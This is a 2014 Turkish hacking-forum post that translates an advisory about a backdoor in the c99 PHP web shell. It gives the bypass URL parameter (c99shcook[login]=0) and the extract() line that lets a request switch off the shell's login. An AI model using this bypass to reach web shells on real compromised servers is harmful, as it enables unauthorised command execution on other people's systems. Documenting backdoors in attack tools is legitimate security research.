⚠️ ÖNEMLİ DUYURU — KİŞİSEL VERİ VE YASADIŞI PAYLAŞIMLAR

Forumda kişisel bilgi (ad, adres, telefon vb.) veya yasa dışı içerik paylaşımı kesinlikle yasaktır. Bu tür paylaşımlar KVKK ve ilgili yasalar gereği suç teşkil eder.

Paylaşım yapan kullanıcıların hesapları kalıcı olarak kapatılacak ve resmî makamlara bildirilecektir. Forum yönetimi, yasal zorunluluklar gereği IP ve oturum kayıtlarını saklamaktadır.

Lütfen gizliliğe ve topluluk kurallarına dikkat ediniz. — Ajanlar.Org Yönetimi

cLowN

Forumdan Uzaklaştırıldı

Katılım

15 Eki 2013

Mesajlar

231

Tepkime puanı

0

Puanları

0

• 20 Ağu 2014

• #1

Merhaba arkadaşlar, CX Security'de gezerken bu exploit'i gördüm.

Ben direk size ingilizceyi çevireceğim ordaki yazandan

-----------------

Tüm c99 shellerin backdoor özelliği vardır. Kullanıcı girişini bypass etmek için URL'ye (?c99shcook[login]=0) bunu eklemeliyiz.

Örnek:

Kod:

 http://127.0.0.1/c99.php?c99shcook[login]=0

Backdoor:

PHP:

@extract($_REQUEST["c99shcook"]);

Which bypasses the authentication here:
if ($login) {
if (empty($md5_pass)) {
$md5_pass = md5($pass);
}
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
if ($login_txt === false) {
$login_txt = "";
} elseif (empty($login_txt)) {
$login_txt = strip_tags(ereg_replace("&nbsp;|<br>", " ", $donated_html));
}
header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt .
"\"");
header("HTTP/1.0 401 Unauthorized");
exit($accessdeniedmess);
}
}

 

Cevap yazmak için giriş yap yada kayıt ol.

Paylaş:

Facebook Twitter Reddit Pinterest Tumblr WhatsApp E-posta Paylaş Link

• Ana sayfa
• Forumlar
• Hack Platform ~
• Web Hack / Security